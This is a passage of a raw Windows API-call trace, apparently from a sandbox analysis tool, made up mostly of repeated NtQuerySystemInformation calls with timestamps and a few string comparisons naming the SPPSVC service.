(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0281.814] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0281.815] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x28, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.824] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf40 | out: lpSystemTimeAsFileTime=0xf7a68fcf40*(dwLowDateTime=0x3a578b48, dwHighDateTime=0x1d63874)) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0281.825] GetTickCount () returned 0x11868d9 [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.844] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0281.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x38, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbe0, Length=0x58, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb00, Length=0x38, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0281.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.862] 